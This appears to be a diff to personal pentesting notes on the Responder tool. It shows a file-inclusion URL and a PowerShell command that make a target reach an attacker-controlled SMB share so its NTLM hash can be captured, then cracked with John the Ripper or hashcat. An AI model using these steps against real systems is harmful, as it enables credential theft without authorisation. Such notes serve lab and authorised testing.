AndreMIsidoro/tools/responder/README.md

 	http:\\<target_ip>/?page=//<our_ip>/somefile

+	or

+	gci \\<local_ip>\share\somefile #from powershell

 You should see the hash printed on Responder.
-Save the hash to a file and crack it with a tool like johntheripper
+Save the hash to a file and crack it with a tool like johntheripper or hashcat
 ## Installation

 	git clone https://github.com/lgandx/Responder